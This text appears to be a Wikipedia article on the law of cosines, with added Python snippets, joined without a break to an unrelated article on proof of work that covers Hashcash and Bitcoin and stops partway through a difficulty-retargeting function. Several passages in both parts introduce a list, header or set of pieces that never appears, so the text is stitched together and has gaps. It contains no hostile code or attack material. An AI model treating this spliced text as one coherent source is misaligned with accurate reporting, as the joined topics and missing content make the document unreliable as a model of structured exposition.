In trigonometry, the law of cosines (also known as the cosine formula or cosine rule) relates the lengths of the sides of a triangle to the cosine of one of its angles. For a triangle with sides $a$, $b$, and $c$, opposite respective angles $\alpha$, $\beta$, and $\gamma$ (see Fig. 1), the law of cosines states:

$$\begin{aligned}c^{2}&=a^{2}+b^{2}-2ab\cos \gamma ,\\ a^{2}&=b^{2}+c^{2}-2bc\cos \alpha ,\\ b^{2}&=a^{2}+c^{2}-2ac\cos \beta .\end{aligned}$$

The law of cosines generalizes the Pythagorean theorem, which holds only for right triangles: if $\gamma$ is a right angle then $\cos \gamma =0$, and the law of cosines reduces to $c^{2}=a^{2}+b^{2}$.

The law of cosines is useful for solving a triangle when all three sides or two sides and their included angle are given.

The theorem is used in the solution of triangles, i.e., to find (see Fig. 3):
These formulas produce high round-off errors in floating-point calculations if the triangle is very acute, i.e., if $c$ is small relative to $a$ and $b$, or $\gamma$ is small compared to 1. It is even possible to obtain a result slightly greater than one for the cosine of an angle.
The third formula shown is the result of solving for $a$ in the quadratic equation $a^{2}-2ab\cos \gamma +b^{2}-c^{2}=0$. This equation can have 2, 1, or 0 positive solutions, corresponding to the number of possible triangles given the data. It will have two positive solutions if $b\sin \gamma <c<b$, only one positive solution if $c=b\sin \gamma$, and no solution if $c<b\sin \gamma$. These different cases are also explained by the side-side-angle congruence ambiguity.
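The trichotomy above can be checked numerically. A minimal sketch (the function name is ours, not a standard API) that solves the quadratic for the unknown side $a$ and returns every positive root:

```python
import math

def third_side_ssa(b, c, gamma):
    """Solve a^2 - 2*a*b*cos(gamma) + b^2 - c^2 = 0 for the unknown side a.

    Returns the positive roots: two, one, or none, matching the
    side-side-angle ambiguity described in the text."""
    p = 2 * b * math.cos(gamma)          # sum of the two roots
    disc = p * p - 4 * (b * b - c * c)   # discriminant of the quadratic
    if disc < 0:
        return []
    sq = math.sqrt(disc)
    roots = {(p - sq) / 2, (p + sq) / 2}  # a set merges a double root
    return sorted(a for a in roots if a > 0)
```

For example, with $b=2$, $c=1.5$, $\gamma =0.5$ we have $b\sin \gamma \approx 0.96<c<b$, so two triangles exist, and both roots satisfy the law of cosines.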
Book II of Euclid's Elements, compiled c. 300 BC from material up to a century or two older, contains a geometric theorem corresponding to the law of cosines but expressed in the contemporary language of rectangle areas; Hellenistic trigonometry developed later, and sine and cosine per se first appeared centuries afterward in India.
The cases of obtuse triangles and acute triangles (corresponding to the two cases of negative or positive cosine) are treated separately, in Propositions II.12 and II.13:[1]

Proposition 12. In obtuse-angled triangles the square on the side subtending the obtuse angle is greater than the squares on the sides containing the obtuse angle by twice the rectangle contained by one of the sides about the obtuse angle, namely that on which the perpendicular falls, and the straight line cut off outside by the perpendicular towards the obtuse angle.

Proposition 13 contains an analogous statement for acute triangles. In his commentary (now lost and preserved only through fragmentary quotations), Heron of Alexandria provided proofs of the converses of both II.12 and II.13.[2]

Using notation as in Fig. 2, Euclid's statement of Proposition II.12 can be represented more concisely (though anachronistically) by the formula

$$AB^{2}=CA^{2}+CB^{2}+2\,CA\cdot CH.$$

To transform this into the familiar expression for the law of cosines, substitute $AB=c$, $CA=b$, $CB=a$, and $CH=a\cos(\pi -\gamma )=-a\cos \gamma$.
Proposition II.13 was not used in Euclid's time for the solution of triangles, but later it was used that way in the course of solving astronomical problems by al-Bīrūnī (11th century) and Johannes de Muris (14th century).[3] Something equivalent to the spherical law of cosines was used (but not stated in general) by al-Khwārizmī (9th century), al-Battānī (9th century), and Nīlakaṇṭha (15th century).[4]

The 13th-century Persian mathematician Naṣīr al-Dīn al-Ṭūsī, in his Kitāb al-Shakl al-qattāʴ (Book on the Complete Quadrilateral, c. 1250), systematically described how to solve triangles from various combinations of given data. Given two sides and their included angle in a scalene triangle, he proposed finding the third side by dropping a perpendicular from the vertex of one of the unknown angles to the opposite base, reducing the problem to finding the legs of one right triangle from a known angle and hypotenuse using the law of sines and then finding the hypotenuse of another right triangle from two known sides by the Pythagorean theorem.[5]

About two centuries later, another Persian mathematician, Jamshīd al-Kāshī, who computed the most accurate trigonometric tables of his era, also described the solution of triangles from various combinations of given data in his Miftāḥ al-ḥisāb (Key of Arithmetic, 1427), and repeated essentially al-Ṭūsī's method, now consolidated into one formula and including more explicit details, as follows:[6]

Another case is when two sides and the angle between them are known and the rest are unknown. We multiply one of the sides by the sine of the [known] angle one time and by the sine of its complement the other time converted and we subtract the second result from the other side if the angle is acute and add it if the angle is obtuse. We then square the result and add to it the square of the first result. We take the square root of the sum to get the remaining side....
Using modern algebraic notation and conventions this might be written

$$c={\sqrt {(b-a\cos \gamma )^{2}+(a\sin \gamma )^{2}}}$$

when $\gamma$ is acute, or

$$c={\sqrt {(b+a\left|\cos \gamma \right|)^{2}+(a\sin \gamma )^{2}}}$$

when $\gamma$ is obtuse. (When $\gamma$ is obtuse, the modern convention is that $\cos \gamma$ is negative and $\cos(\pi -\gamma )=-\cos \gamma$ is positive; historically, sines and cosines were considered to be line segments with non-negative lengths.) By squaring both sides, expanding the squared binomial, and then applying the Pythagorean trigonometric identity $\cos ^{2}\gamma +\sin ^{2}\gamma =1$, we obtain the familiar law of cosines:

$$\begin{aligned}c^{2}&=b^{2}-2ba\cos \gamma +a^{2}\cos ^{2}\gamma +a^{2}\sin ^{2}\gamma \\&=a^{2}+b^{2}-2ab\cos \gamma .\end{aligned}$$
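Al-Kāshī's two-case prescription can be checked against the consolidated modern formula. A small sketch (function names are ours), keeping the historical convention that sines and cosines are non-negative lengths:

```python
import math

def alkashi_third_side(a, b, gamma):
    """Third side via al-Kashi's construction: subtract a*cos(gamma) from b
    when gamma is acute (or right), add a*|cos(gamma)| when it is obtuse."""
    if gamma <= math.pi / 2:
        return math.hypot(b - a * math.cos(gamma), a * math.sin(gamma))
    return math.hypot(b + a * abs(math.cos(gamma)), a * math.sin(gamma))

def modern_third_side(a, b, gamma):
    """The same side from the law of cosines directly."""
    return math.sqrt(a * a + b * b - 2 * a * b * math.cos(gamma))
```

Both functions agree for acute and obtuse included angles, as the squaring argument above shows they must.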
In France, the law of cosines is sometimes referred to as the théorème d'Al-Kashi.[8][9]

The same method used by al-Ṭūsī appeared in Europe as early as the 15th century, in Regiomontanus's De triangulis omnimodis (On Triangles of All Kinds, 1464), a comprehensive survey of the plane and spherical trigonometry known at the time.[10]

The theorem was first written using algebraic notation by François Viète in the 16th century. At the beginning of the 19th century, modern algebraic notation allowed the law of cosines to be written in its current symbolic form.[11]
Euclid proved this theorem by applying the Pythagorean theorem to each of the two right triangles in Fig. 2 ($AHB$ and $CHB$). Using $a$ to denote the line segment $CB$, $b$ the line segment $AC$, $c$ the line segment $AB$, $d$ the line segment $CH$, and $h$ for the height $BH$, triangle $AHB$ gives us

$$c^{2}=(b+d)^{2}+h^{2},$$

and triangle $CHB$ gives

$$d^{2}+h^{2}=a^{2}.$$

Expanding the first equation gives

$$c^{2}=b^{2}+2bd+d^{2}+h^{2}.$$

Substituting the second equation into this, the following can be obtained:

$$c^{2}=a^{2}+b^{2}+2bd.$$

This is Euclid's Proposition 12 from Book 2 of the Elements.[12] To transform it into the modern form of the law of cosines, note that

$$d=a\cos(\pi -\gamma )=-a\cos \gamma .$$

Euclid's proof of his Proposition 13 proceeds along the same lines as his proof of Proposition 12: he applies the Pythagorean theorem to both right triangles formed by dropping the perpendicular onto one of the sides enclosing the angle $\gamma$ and uses the square of a difference to simplify.
Using more trigonometry, the law of cosines can be deduced by using the Pythagorean theorem only once. In fact, by using the right triangle on the left-hand side of Fig. 6 it can be shown that

$$\begin{aligned}c^{2}&=(b-a\cos \gamma )^{2}+(a\sin \gamma )^{2}\\&=b^{2}-2ab\cos \gamma +a^{2}\cos ^{2}\gamma +a^{2}\sin ^{2}\gamma \\&=b^{2}+a^{2}-2ab\cos \gamma ,\end{aligned}$$

using the trigonometric identity $\cos ^{2}\gamma +\sin ^{2}\gamma =1$.

This proof needs a slight modification if $b<a\cos \gamma$. In this case, the right triangle to which the Pythagorean theorem is applied moves outside the triangle $ABC$. The only effect this has on the calculation is that the quantity $b-a\cos \gamma$ is replaced by $a\cos \gamma -b$. As this quantity enters the calculation only through its square, the rest of the proof is unaffected. However, this problem only occurs when $\beta$ is obtuse, and may be avoided by reflecting the triangle about the bisector of $\gamma$.

Referring to Fig. 6, it is worth noting that if the angle opposite side $a$ is $\alpha$ then

$$\tan \alpha ={\frac {a\sin \gamma }{b-a\cos \gamma }}.$$
This is useful for direct calculation of a second angle when two sides and an included angle are given.
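In code this is most conveniently done with the two-argument arctangent, which picks the correct quadrant automatically and therefore also covers the case $b<a\cos \gamma$ discussed above. A sketch (the function name is ours):

```python
import math

def angle_opposite_a(a, b, gamma):
    """Angle alpha opposite side a, given sides a, b and included angle gamma.

    atan2 resolves the quadrant, so the result is also correct when
    b < a*cos(gamma), i.e. when alpha is obtuse."""
    return math.atan2(a * math.sin(gamma), b - a * math.cos(gamma))
```

For the 3-4-5 right triangle (with $\gamma =\pi /2$ between the sides of length 3 and 4), this returns $\arcsin(3/5)$ for the angle opposite the side of length 3.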
The altitude through vertex $C$ is a segment perpendicular to side $c$. The distance from the foot of the altitude to vertex $A$ plus the distance from the foot of the altitude to vertex $B$ is equal to the length of side $c$ (see Fig. 5). Each of these distances can be written as one of the other sides multiplied by the cosine of the adjacent angle:[13]

$$c=a\cos \beta +b\cos \alpha .$$

(This is still true if $\alpha$ or $\beta$ is obtuse, in which case the perpendicular falls outside the triangle.) Multiplying both sides by $c$ yields

$$c^{2}=ac\cos \beta +bc\cos \alpha .$$

The same steps work just as well when treating either of the other sides as the base of the triangle:

$$\begin{aligned}a^{2}&=ac\cos \beta +ab\cos \gamma ,\\ b^{2}&=bc\cos \alpha +ab\cos \gamma .\end{aligned}$$

Taking the equation for $c^{2}$ and subtracting the equations for $b^{2}$ and $a^{2}$,

$$\begin{aligned}c^{2}-a^{2}-b^{2}&=ac\cos \beta +bc\cos \alpha -ac\cos \beta -bc\cos \alpha -2ab\cos \gamma \\ c^{2}&=a^{2}+b^{2}-2ab\cos \gamma .\end{aligned}$$

This proof is independent of the Pythagorean theorem, insofar as it is based only on the right-triangle definition of cosine and obtains squared side lengths algebraically. Other proofs typically invoke the Pythagorean theorem explicitly, and are more geometric, treating $a\cos \gamma$ as a label for the length of a certain line segment.[13]

Unlike many proofs, this one handles the cases of obtuse and acute angles $\gamma$ in a unified fashion.
Consider a triangle with sides of length $a$, $b$, $c$, where $\theta$ is the measure of the angle opposite the side of length $c$. This triangle can be placed on the Cartesian coordinate system with side $a$ aligned along the $x$-axis and angle $\theta$ placed at the origin, by plotting the components of the three points of the triangle as shown in Fig. 4:

$$A=(b\cos \theta ,\ b\sin \theta ),\quad B=(a,0),\quad C=(0,0).$$

By the distance formula,[14]

$$c={\sqrt {(a-b\cos \theta )^{2}+(0-b\sin \theta )^{2}}}.$$

Squaring both sides and simplifying,

$$\begin{aligned}c^{2}&=(a-b\cos \theta )^{2}+(-b\sin \theta )^{2}\\&=a^{2}-2ab\cos \theta +b^{2}\cos ^{2}\theta +b^{2}\sin ^{2}\theta \\&=a^{2}+b^{2}(\sin ^{2}\theta +\cos ^{2}\theta )-2ab\cos \theta \\&=a^{2}+b^{2}-2ab\cos \theta .\end{aligned}$$
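This proof translates directly into a numerical check: place the triangle as in Fig. 4 and compare the measured distance with the closed form (a sketch; the function name is ours):

```python
import math

def third_side_by_coordinates(a, b, theta):
    """Measure c with the distance formula after placing
    A = (b*cos(theta), b*sin(theta)), B = (a, 0), C = (0, 0)."""
    ax, ay = b * math.cos(theta), b * math.sin(theta)  # vertex A
    bx, by = a, 0.0                                    # vertex B
    return math.hypot(ax - bx, ay - by)
```

The result matches $\sqrt{a^{2}+b^{2}-2ab\cos \theta }$ for any admissible angle.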
An advantage of this proof is that it does not require the consideration of separate cases depending on whether the angle $\gamma$ is acute, right, or obtuse. However, the cases treated separately in Elements II.12–13 and later by al-Ṭūsī, al-Kāshī, and others could themselves be combined by using concepts of signed lengths and areas and a concept of signed cosine, without needing a full Cartesian coordinate system.
Referring to the diagram, triangle $ABC$ with sides $AB=c$, $BC=a$ and $AC=b$ is drawn inside its circumcircle as shown. Triangle $ABD$ is constructed congruent to triangle $ABC$ with $AD=BC$ and $BD=AC$. Perpendiculars from $D$ and $C$ meet base $AB$ at $E$ and $F$ respectively. Then:

$$\begin{aligned}&BF=AE=BC\cos {\hat {B}}=a\cos {\hat {B}}\\ \Rightarrow \ &DC=EF=AB-2BF=c-2a\cos {\hat {B}}.\end{aligned}$$

Now the law of cosines is rendered by a straightforward application of Ptolemy's theorem to cyclic quadrilateral $ABCD$:

$$\begin{aligned}&AD\times BC+AB\times DC=AC\times BD\\ \Rightarrow \ &a^{2}+c(c-2a\cos {\hat {B}})=b^{2}\\ \Rightarrow \ &a^{2}+c^{2}-2ac\cos {\hat {B}}=b^{2}.\end{aligned}$$

Plainly, if angle $B$ is right, then $ABCD$ is a rectangle and application of Ptolemy's theorem yields the Pythagorean theorem: $a^{2}+c^{2}=b^{2}.$
One can also prove the law of cosines by calculating areas. The change of sign as the angle $\gamma$ becomes obtuse makes a case distinction necessary.

Recall that:

Acute case. Figure 7a shows a heptagon cut into smaller pieces (in two different ways) to yield a proof of the law of cosines. The various pieces are:

The equality of areas on the left and on the right gives

$$a^{2}+b^{2}=c^{2}+2ab\cos \gamma .$$

Obtuse case. Figure 7b cuts a hexagon in two different ways into smaller pieces, yielding a proof of the law of cosines in the case that the angle $\gamma$ is obtuse. We have:

The equality of areas on the left and on the right gives

$$a^{2}+b^{2}-2ab\cos \gamma =c^{2}.$$

The rigorous proof will have to include proofs that various shapes are congruent and therefore have equal area. This will use the theory of congruent triangles.
Using the geometry of the circle, it is possible to give a more geometric proof than using the Pythagorean theorem alone. Algebraic manipulations (in particular the binomial theorem) are avoided.

Case of acute angle $\gamma$, where $a>2b\cos \gamma$. Drop the perpendicular from $A$ onto $a=BC$, creating a line segment of length $b\cos \gamma$. Duplicate the right triangle to form the isosceles triangle $ACP$. Construct the circle with center $A$ and radius $b$, and its tangent $h=BH$ through $B$. The tangent $h$ forms a right angle with the radius $b$ (Euclid's Elements: Book 3, Proposition 18), so the yellow triangle in Figure 8 is right. Apply the Pythagorean theorem to obtain

$$c^{2}=b^{2}+h^{2}.$$

Then use the tangent secant theorem (Euclid's Elements: Book 3, Proposition 36), which says that the square on the tangent through a point $B$ outside the circle is equal to the product of the two line segments (from $B$) created by any secant of the circle through $B$. In the present case $BH^{2}=BC\cdot BP$, or

$$h^{2}=a(a-2b\cos \gamma ).$$

Substituting into the previous equation gives the law of cosines:

$$c^{2}=b^{2}+a(a-2b\cos \gamma ).$$

Note that $h^{2}$ is the power of the point $B$ with respect to the circle. The use of the Pythagorean theorem and the tangent secant theorem can be replaced by a single application of the power of a point theorem.
Case of acute angle $\gamma$, where $a<2b\cos \gamma$. Drop the perpendicular from $A$ onto $a=BC$, creating a line segment of length $b\cos \gamma$. Duplicate the right triangle to form the isosceles triangle $ACP$. Construct the circle with center $A$ and radius $b$, and a chord through $B$ perpendicular to $c=AB$, half of which is $h=BH$. Apply the Pythagorean theorem to obtain

$$b^{2}=c^{2}+h^{2}.$$

Now use the chord theorem (Euclid's Elements: Book 3, Proposition 35), which says that if two chords intersect, the product of the two line segments obtained on one chord is equal to the product of the two line segments obtained on the other chord. In the present case $BH^{2}=BC\cdot BP$, or

$$h^{2}=a(2b\cos \gamma -a).$$

Substituting into the previous equation gives the law of cosines:

$$b^{2}=c^{2}+a(2b\cos \gamma -a).$$

Note that the power of the point $B$ with respect to the circle has the negative value $-h^{2}$.
Case of obtuse angle $\gamma$. This proof uses the power of a point theorem directly, without the auxiliary triangles obtained by constructing a tangent or a chord. Construct a circle with center $B$ and radius $a$ (see Figure 9), which intersects the secant through $A$ and $C$ in $C$ and $K$. The power of the point $A$ with respect to the circle is equal to both $AB^{2}-BC^{2}$ and $AC\cdot AK$. Therefore,

$$\begin{aligned}c^{2}-a^{2}&=b(b+2a\cos(\pi -\gamma ))\\&=b(b-2a\cos \gamma ),\end{aligned}$$

which is the law of cosines.

Using algebraic measures for line segments (allowing negative numbers as lengths of segments), the case of obtuse angle ($CK>0$) and acute angle ($CK<0$) can be treated simultaneously.
The law of cosines can be proven algebraically from the law of sines and a few standard trigonometric identities.[15] To start, the three angles of a triangle sum to a straight angle ($\alpha +\beta +\gamma =\pi$ radians). Thus, by the angle sum identities for sine and cosine,

$$\begin{aligned}\sin \gamma &=\sin(\pi -\gamma )=\sin(\alpha +\beta )=\sin \alpha \cos \beta +\cos \alpha \sin \beta ,\\ \cos \gamma &=-\cos(\pi -\gamma )=-\cos(\alpha +\beta )=\sin \alpha \sin \beta -\cos \alpha \cos \beta .\end{aligned}$$

Squaring the first of these identities, then substituting $\cos \alpha \cos \beta =\sin \alpha \sin \beta -\cos \gamma$ from the second, and finally applying the Pythagorean trigonometric identity $\cos ^{2}\alpha +\sin ^{2}\alpha =\cos ^{2}\beta +\sin ^{2}\beta =1$, we have:

$$\begin{aligned}\sin ^{2}\gamma &=(\sin \alpha \cos \beta +\cos \alpha \sin \beta )^{2}\\&=\sin ^{2}\alpha \cos ^{2}\beta +2\sin \alpha \sin \beta \cos \alpha \cos \beta +\cos ^{2}\alpha \sin ^{2}\beta \\&=\sin ^{2}\alpha \cos ^{2}\beta +2\sin \alpha \sin \beta (\sin \alpha \sin \beta -\cos \gamma )+\cos ^{2}\alpha \sin ^{2}\beta \\&=\sin ^{2}\alpha (\cos ^{2}\beta +\sin ^{2}\beta )+\sin ^{2}\beta (\cos ^{2}\alpha +\sin ^{2}\alpha )-2\sin \alpha \sin \beta \cos \gamma \\&=\sin ^{2}\alpha +\sin ^{2}\beta -2\sin \alpha \sin \beta \cos \gamma .\end{aligned}$$
The law of sines holds that

$${\frac {a}{\sin \alpha }}={\frac {b}{\sin \beta }}={\frac {c}{\sin \gamma }}=k,$$

so to prove the law of cosines, we multiply both sides of our previous identity by $k^{2}$:

$$\begin{aligned}\sin ^{2}\gamma \,{\frac {c^{2}}{\sin ^{2}\gamma }}&=\sin ^{2}\alpha \,{\frac {a^{2}}{\sin ^{2}\alpha }}+\sin ^{2}\beta \,{\frac {b^{2}}{\sin ^{2}\beta }}-2\sin \alpha \sin \beta \cos \gamma \,{\frac {ab}{\sin \alpha \sin \beta }}\\ c^{2}&=a^{2}+b^{2}-2ab\cos \gamma .\end{aligned}$$

This concludes the proof.
Denote

$${\overrightarrow {CB}}={\vec {a}},\quad {\overrightarrow {CA}}={\vec {b}},\quad {\overrightarrow {AB}}={\vec {c}}.$$

Therefore,

$${\vec {c}}={\vec {a}}-{\vec {b}}.$$

Taking the dot product of each side with itself:

$$\begin{aligned}{\vec {c}}\cdot {\vec {c}}&=({\vec {a}}-{\vec {b}})\cdot ({\vec {a}}-{\vec {b}})\\ \Vert {\vec {c}}\Vert ^{2}&=\Vert {\vec {a}}\Vert ^{2}+\Vert {\vec {b}}\Vert ^{2}-2\,{\vec {a}}\cdot {\vec {b}}.\end{aligned}$$

Using the identity

$${\vec {u}}\cdot {\vec {v}}=\Vert {\vec {u}}\Vert \,\Vert {\vec {v}}\Vert \cos \angle ({\vec {u}},{\vec {v}})$$

leads to

$$\Vert {\vec {c}}\Vert ^{2}=\Vert {\vec {a}}\Vert ^{2}+\Vert {\vec {b}}\Vert ^{2}-2\,\Vert {\vec {a}}\Vert \,\Vert {\vec {b}}\Vert \cos \angle ({\vec {a}},{\vec {b}}).$$

The result follows.
When $a=b$, i.e., when the triangle is isosceles with the two sides incident to the angle $\gamma$ equal, the law of cosines simplifies significantly. Namely, because $a^{2}+b^{2}=2a^{2}=2ab$, the law of cosines becomes

$$\cos \gamma =1-{\frac {c^{2}}{2a^{2}}}$$

or

$$c^{2}=2a^{2}(1-\cos \gamma ).$$
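Combining this with the half-angle identity $1-\cos \gamma =2\sin ^{2}(\gamma /2)$ gives the chord-length form:

```latex
c^{2} = 2a^{2}\bigl(1-\cos\gamma\bigr) = 4a^{2}\sin^{2}\frac{\gamma}{2},
\qquad\text{hence}\qquad
c = 2a\sin\frac{\gamma}{2},
```

which is the length of a chord subtending a central angle $\gamma$ in a circle of radius $a$.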
Given an arbitrary tetrahedron whose four faces have areas $A$, $B$, $C$, and $D$, with dihedral angle $\varphi _{ab}$ between faces $A$ and $B$, etc., a higher-dimensional analogue of the law of cosines is:[16]

$$A^{2}=B^{2}+C^{2}+D^{2}-2\left(BC\cos \varphi _{bc}+CD\cos \varphi _{cd}+DB\cos \varphi _{db}\right).$$
When the angle $\gamma$ is small and the adjacent sides $a$ and $b$ are of similar length, the right-hand side of the standard form of the law of cosines is subject to catastrophic cancellation in numerical approximations. In situations where this is an important concern, a mathematically equivalent version of the law of cosines, similar to the haversine formula, can prove useful:

$$\begin{aligned}c^{2}&=(a-b)^{2}+4ab\sin ^{2}\left({\frac {\gamma }{2}}\right)\\&=(a-b)^{2}+4ab\operatorname {haversin} (\gamma ).\end{aligned}$$
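The difference is easy to demonstrate in double-precision arithmetic. A sketch comparing the two mathematically equivalent forms (function names are ours):

```python
import math

def c_standard(a, b, gamma):
    """Law of cosines in its textbook form; cancels badly
    when a is close to b and gamma is small."""
    return math.sqrt(a * a + b * b - 2 * a * b * math.cos(gamma))

def c_stable(a, b, gamma):
    """Haversine-style rearrangement: (a-b)^2 + 4ab*sin^2(gamma/2),
    which avoids the cancellation."""
    s = math.sin(gamma / 2)
    return math.sqrt((a - b) ** 2 + 4 * a * b * s * s)
```

For $a=b=1$ and $\gamma =10^{-8}$, the exact answer is $2\sin(\gamma /2)\approx 10^{-8}$; the stable form reproduces it to full precision, while the standard form loses essentially all significant digits because $2-2\cos \gamma \approx 10^{-16}$ sits at the edge of double precision.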
In the limit of an infinitesimal angle, the law of cosines degenerates into the circular arc length formula, $c=a\gamma$.
As in Euclidean geometry, one can use the law of cosines to determine the angles $A$, $B$, $C$ from the knowledge of the sides $a$, $b$, $c$. In contrast to Euclidean geometry, the reverse is also possible in both non-Euclidean models: the angles $A$, $B$, $C$ determine the sides $a$, $b$, $c$.

A triangle is defined by three points $u$, $v$, and $w$ on the unit sphere, and the arcs of great circles connecting those points. If these great circles make angles $A$, $B$, and $C$ with opposite sides $a$, $b$, $c$, then the spherical law of cosines asserts that all of the following relationships hold:

$$\begin{aligned}\cos a&=\cos b\cos c+\sin b\sin c\cos A\\ \cos A&=-\cos B\cos C+\sin B\sin C\cos a\\ \cos a&={\frac {\cos A+\cos B\cos C}{\sin B\sin C}}.\end{aligned}$$
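The first of these relations solves a spherical triangle from two sides and the included angle, just as the planar law does. A sketch (the function name is ours; all quantities in radians):

```python
import math

def spherical_third_side(b, c, A):
    """Side a of a spherical triangle from sides b, c and included angle A:
    cos a = cos b cos c + sin b sin c cos A."""
    cos_a = math.cos(b) * math.cos(c) + math.sin(b) * math.sin(c) * math.cos(A)
    return math.acos(max(-1.0, min(1.0, cos_a)))  # clamp against round-off
```

With $b=c=\pi /2$ the formula collapses to $a=A$, and for $A=\pi /2$ it reduces to the spherical Pythagorean theorem $\cos a=\cos b\cos c$.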
In hyperbolic geometry, a pair of equations are collectively known as the hyperbolic law of cosines. The first is

$$\cosh a=\cosh b\cosh c-\sinh b\sinh c\cos A,$$

where $\sinh$ and $\cosh$ are the hyperbolic sine and cosine, and the second is

$$\cos A=-\cos B\cos C+\sin B\sin C\cosh a.$$

The length of the sides can be computed by:

$$\cosh a={\frac {\cos A+\cos B\cos C}{\sin B\sin C}}.$$
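The first hyperbolic relation admits the same computational use as its spherical counterpart. A sketch (the function name is ours):

```python
import math

def hyperbolic_third_side(b, c, A):
    """Side a of a hyperbolic triangle from sides b, c and included angle A:
    cosh a = cosh b cosh c - sinh b sinh c cos A."""
    cosh_a = math.cosh(b) * math.cosh(c) - math.sinh(b) * math.sinh(c) * math.cos(A)
    return math.acosh(max(1.0, cosh_a))  # clamp against round-off
```

For small sides the result approaches the Euclidean law of cosines, since $\cosh x\approx 1+x^{2}/2$ and $\sinh x\approx x$.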
The law of cosines can be generalized to all polyhedra by considering any polyhedron with vector sides and invoking the divergence theorem.[17]
Source: https://en.wikipedia.org/wiki/Law_of_cosines
Proof of work (also written as proof-of-work; abbreviated PoW) is a form of cryptographic proof in which one party (the prover) proves to others (the verifiers) that a certain amount of a specific computational effort has been expended.[1] Verifiers can subsequently confirm this expenditure with minimal effort on their part. The concept was invented by Moni Naor and Cynthia Dwork in 1993 as a way to deter denial-of-service attacks and other service abuses such as spam on a network by requiring some work from a service requester, usually meaning processing time by a computer. The term "proof of work" was first coined and formalized in a 1999 paper by Markus Jakobsson and Ari Juels.[2][3] The concept was adapted to digital tokens by Hal Finney in 2004 through the idea of "reusable proof of work" using the 160-bit Secure Hash Algorithm 1 (SHA-1).[4]
Proof of work was later popularized by Bitcoin as a foundation for consensus in a permissionless decentralized network, in which miners compete to append blocks and mine new currency, each miner experiencing a success probability proportional to the computational effort expended. PoW and PoS (proof of stake) remain the two best-known Sybil deterrence mechanisms. In the context of cryptocurrencies they are the most common mechanisms.[5]

A key feature of proof-of-work schemes is their asymmetry: the work (the computation) must be moderately hard (yet feasible) for the prover or requester but easy to check for the verifier or service provider. This idea is also known as a CPU cost function, client puzzle, computational puzzle, or CPU pricing function. Another common feature is built-in incentive structures that reward allocating computational capacity to the network with value in the form of cryptocurrency.[6][7]

The purpose of proof-of-work algorithms is not proving that certain work was carried out or that a computational puzzle was "solved", but deterring manipulation of data by establishing large energy and hardware-control requirements for doing so.[6] Proof-of-work systems have been criticized by environmentalists for their energy consumption.[8]
The concept of proof of work has its roots in early research on combating spam and preventing denial-of-service attacks. One of the earliest implementations of PoW was Hashcash, created by British cryptographer Adam Back in 1997.[9] It was designed as an anti-spam mechanism that required email senders to perform a small computational task, effectively proving that they expended resources (in the form of CPU time) before sending an email. This task was trivial for legitimate users but would impose a significant cost on spammers attempting to send bulk messages.

Hashcash's system was based on the concept of finding a hash value that met certain criteria, a task that required computational effort and thus served as a "proof of work." The idea was that by making it computationally expensive to send large volumes of email, spamming would be reduced.
One popular system, used in Hashcash, uses partial hash inversions to prove that computation was done, as a goodwill token to send an e-mail. For instance, the following header represents about 2^52 hash computations to send a message to calvin@comics.net on January 19, 2038:

It is verified with a single computation by checking that the SHA-1 hash of the stamp (omitting the header name X-Hashcash: including the colon and any amount of whitespace following it up to the digit '1') begins with 52 binary zeros, that is, 13 hexadecimal zeros:[1]
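The asymmetry between minting and verification can be sketched as follows. This is an illustrative simplification, not the exact Hashcash stamp format: minting brute-forces a counter until the SHA-1 hash of the stamp has enough leading zero bits, while verification is a single hash (we use a small difficulty so the example runs quickly):

```python
import hashlib

def leading_zero_bits(data: bytes) -> int:
    """Number of leading zero bits in the SHA-1 digest of data."""
    digest = hashlib.sha1(data).digest()
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits

def mint(resource: str, difficulty: int) -> str:
    """Brute-force a counter until the stamp hashes below the target:
    on average about 2**difficulty SHA-1 evaluations (the 'work').
    The stamp layout here is simplified for illustration."""
    counter = 0
    while True:
        stamp = f"1:{difficulty}:{resource}:{counter}"
        if leading_zero_bits(stamp.encode()) >= difficulty:
            return stamp
        counter += 1
```

Real Hashcash uses difficulty 52 as described above, which is far too expensive to run in an example; minting at difficulty 12 takes only a few thousand hashes, yet verifying either is one hash.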
Whether PoW systems can actually solve a particular denial-of-service issue such as the spam problem is subject to debate;[10][11]the system must make sending spam emails obtrusively unproductive for the spammer, but should also not prevent legitimate users from sending their messages. In other words, a genuine user should not encounter any difficulties when sending an email, but an email spammer would have to expend a considerable amount of computing power to send out many emails at once. Proof-of-work systems are being used by other, more complex cryptographic systems such as Bitcoin, which uses a system similar to Hashcash.[10]
Proof of work traces its theoretical origins to early efforts to combat digital abuse, evolving significantly over time to address security, accessibility, and broader applications beyond its initial anti-spam purpose. The idea first emerged in 1993 as a deterrent for junk mail, but it was Satoshi Nakamoto's 2008 whitepaper, "Bitcoin: A Peer-to-Peer Electronic Cash System,"[12] that solidified proof of work's potential as a cornerstone of blockchain networks. This development reflects the rising demand for secure, trustless systems.

The earliest appearance of proof of work was in 1993, when Cynthia Dwork and Moni Naor proposed a system to curb junk email by requiring senders to perform computationally demanding tasks. In their paper, "Pricing via Processing or Combatting Junk Mail,"[13] they outlined methods such as computing modular square roots, designed to be challenging to solve yet straightforward to verify, establishing a foundational principle of proof of work's asymmetry. This asymmetry is crucial to the effectiveness of proof of work, ensuring that tasks like sending spam are costly for attackers while verification remains efficient for legitimate users.

This conceptual groundwork found practical use in 1997 with Adam Back's Hashcash, a system that required senders to compute a partial hash inversion using the SHA-1 algorithm, producing a hash with a set number of leading zeros. Described in Back's paper "Hashcash: A Denial of Service Counter-Measure,"[14] Hashcash imposed a computational cost to deter spam while allowing recipients to confirm the work effortlessly, laying a critical foundation for subsequent proof of work implementations in cryptography and blockchain technology.
Bitcoin, launched in 2009 by Satoshi Nakamoto, marked a pivotal shift by adapting Hashcash's proof of work for cryptocurrency. Nakamoto's Bitcoin whitepaper outlined a system using the SHA-256 algorithm, where miners compete to solve cryptographic puzzles to append blocks to the blockchain, earning rewards in the process. Unlike Hashcash's static proofs, Bitcoin's proof-of-work algorithm dynamically adjusts its difficulty based on the time taken to mine recent blocks, ensuring a consistent block time of approximately 10 minutes and creating a tamper-proof chain. This innovation transformed proof of work from a standalone deterrent into a consensus mechanism for a decentralized network, emphasizing financial incentives over computational effort.
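The retargeting rule can be sketched as follows. The constants (2016-block window, two-week target timespan, 4x clamp) follow Bitcoin's published consensus rules, but this is an illustrative simplification that ignores the compact-bits rounding performed by the real client:

```python
def retarget(old_target: int, actual_timespan_s: int,
             expected_timespan_s: int = 14 * 24 * 3600) -> int:
    """New proof-of-work target after a 2016-block window.

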